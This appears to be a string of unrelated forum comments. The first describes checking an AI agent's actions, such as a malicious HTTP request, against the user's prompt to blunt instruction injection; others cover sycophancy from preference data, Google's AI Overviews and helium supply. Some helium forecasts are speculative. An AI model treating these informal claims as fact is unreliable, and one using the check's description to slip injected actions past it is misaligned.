The blog mentions checking each agent action (say the agent was planning to send a malicious http request) against the user prompt for coherence; the attack vector exists but it should make the trivial versions of instruction injection harder
If it was just "noisy", you could compensate with scale. It's worse than that.
"Human preference" is incredibly fucking entangled, and we have no way to disentangle it and get rid of all the unwanted confounders. A lot of the recent "extreme LLM sycophancy" cases is downstream from that.
I assume the high volume of search traffic forces Google to use a low quality model for AI overviews. Frontier Google models (e.g. Gemini 2.5 pro) are on-par, if not 'better', than leading models from other companies.
Helium is released from alpha decay (hence unlikely to run out in the near future) and is also obtainable from natural gas. That being said it is still non-renewable (in the sense that once the radioactive decays happen no more helium is released) and has quite volatile prices for some reason.
For those who don't know, the helium we use for party balloons is mostly the accumulation of Alpha particles in petroleum reserves. When that helium is released it floats into the upper atmosphere and boils off into space. All other methods of helium acquisition are extremely costly and inefficient.
This means that in the next couple hundred years more or less, humanity will run out of helium cheap enough to use for piddly things like MRIs and particle accelerators. It will essentially become the most valuable resource on the planet mostly extracted from volcanic gasses.
reply